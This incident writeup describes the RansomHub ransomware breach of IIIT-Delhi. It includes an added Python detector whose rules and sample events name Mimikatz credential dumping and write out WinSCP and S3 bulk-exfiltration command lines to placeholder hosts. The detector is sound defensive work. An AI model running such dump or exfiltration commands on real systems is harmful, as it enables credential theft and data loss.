RansomHub Ransomware Attack Exposes 140GB Data at IIIT-Delhi

Incident Date: Aug 30, 2024

Attack Overview

VICTIM: Indraprastha Institute of Information Technology Delhi (IIIT-Delhi)
INDUSTRY: Education
LOCATION: India
ATTACKER: RansomHub
FIRST REPORTED: August 30, 2024

RansomHub Ransomware Attack on IIIT-Delhi

Indraprastha Institute of Information Technology Delhi (IIIT-Delhi), a prominent educational institution in India, has been targeted by the ransomware group RansomHub. The attack, discovered on September 2, 2024, has led to a significant data breach, with 140GB of sensitive information, including personally identifiable information (PII) and non-disclosure agreements (NDAs), being compromised.

About IIIT-Delhi

Established in 2008, IIIT-Delhi is a state university located in Okhla, New Delhi. The institute offers a range of undergraduate, postgraduate, and doctoral programs, primarily focusing on engineering and technology. It is recognized for its research-led approach to education and has a strong faculty base with numerous projects and collaborations addressing real-world challenges. The campus spans 25 acres and includes state-of-the-art laboratories, a comprehensive library, and recreational facilities.

Attack Overview

The ransomware attack on IIIT-Delhi was orchestrated by RansomHub, a Ransomware-as-a-Service (RaaS) group known for its aggressive affiliate model and double extortion tactics. The attack resulted in the exfiltration of 140GB of sensitive data, posing a serious threat to the privacy and security of the institution's stakeholders. The breach points to weaknesses in the institution's cybersecurity infrastructure that made it a target for sophisticated threat actors.

About RansomHub

RansomHub emerged in February 2024 and quickly established itself in the ransomware landscape. The group is known for its speed and efficiency, using advanced data exfiltration techniques and intermittent encryption to minimize encryption time while maintaining impact. RansomHub affiliates primarily use phishing campaigns, vulnerability exploitation, and password spraying to gain initial access to target systems. The group has a reputation for targeting high-value sectors such as healthcare, financial services, and government.

Penetration Methods

RansomHub likely penetrated IIIT-Delhi's systems through a combination of phishing campaigns and exploitation of unpatched vulnerabilities. The group's affiliates are known to use tools like Mimikatz and PsExec for privilege escalation and lateral movement. They also employ advanced techniques for data exfiltration, using tools like WinSCP or cloud storage such as AWS S3 to transfer stolen data to remote servers.
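As an added defender-side example (not part of the original writeup), a small Python detector that flags the post-compromise tooling named above in process-creation telemetry; the event field names, the sample events and the rule patterns are constructed assumptions, not a real schema or a vendor rule set:

```python
"""Flag PsExec (lateral movement), Mimikatz (credential access) and
WinSCP / AWS S3 (exfiltration) in process-creation events.
Events use a Sysmon-like shape; the field names are assumptions."""
import re
from collections import defaultdict

# Each rule: (label, regex applied to "image command_line" in lowercase).
RULES = [
    ("lateral_movement/psexec", re.compile(r"psexesvc\.exe|\bpsexec(64)?\.exe")),
    ("credential_access/mimikatz", re.compile(r"mimikatz|sekurlsa::|lsadump::")),
    ("exfiltration/winscp", re.compile(r"winscp(\.com|\.exe)?\b.*(sftp|scp|ftps)://")),
    ("exfiltration/s3", re.compile(r"\baws(\.exe)?\s+s3\s+(cp|sync|mv)\b.*\bs3://")),
]

# Constructed sample events; hosts, users and addresses are placeholders.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "alice", "image": r"C:\Windows\PSEXESVC.exe",
     "command_line": "PSEXESVC.exe"},
    {"host": "ws-01", "user": "alice", "image": r"C:\Temp\m.exe",
     "command_line": '"m.exe" "privilege::debug" "sekurlsa::logonpasswords"'},
    {"host": "fs-02", "user": "svc_backup", "image": r"C:\Program Files\WinSCP\WinSCP.com",
     "command_line": 'WinSCP.com /command "open sftp://user@203.0.113.10/" "put C:\\Shares\\HR\\*" "exit"'},
    {"host": "fs-02", "user": "svc_backup", "image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",
     "command_line": "aws s3 sync C:\\Shares\\Research s3://example-bucket-placeholder/"},
    {"host": "ws-03", "user": "bob", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

def detect(events):
    """Return one (host, user, rule label) finding per rule that matches an event."""
    findings = []
    for ev in events:
        haystack = f"{ev['image']} {ev['command_line']}".lower()
        for label, pattern in RULES:
            if pattern.search(haystack):
                findings.append((ev["host"], ev["user"], label))
    return findings

def hosts_with_multiple_tools(findings):
    """Hosts where more than one distinct tool fired. A lone hit (an admin's
    legitimate PsExec run) is weak evidence; credential dumping followed by
    bulk transfer on the same host is what to isolate first."""
    tools = defaultdict(set)
    for host, _user, label in findings:
        tools[host].add(label)
    return sorted(h for h, t in tools.items() if len(t) > 1)

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("hosts to triage first:", hosts_with_multiple_tools(hits))
```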

Impact and Implications

The ransomware attack on IIIT-Delhi underscores the growing threat of ransomware to educational institutions. The breach not only compromises sensitive data but also disrupts the institution's operations and tarnishes its reputation. As IIIT-Delhi continues to address the fallout from this attack, it serves as a stark reminder of the importance of cybersecurity measures in protecting against sophisticated threat actors like RansomHub.
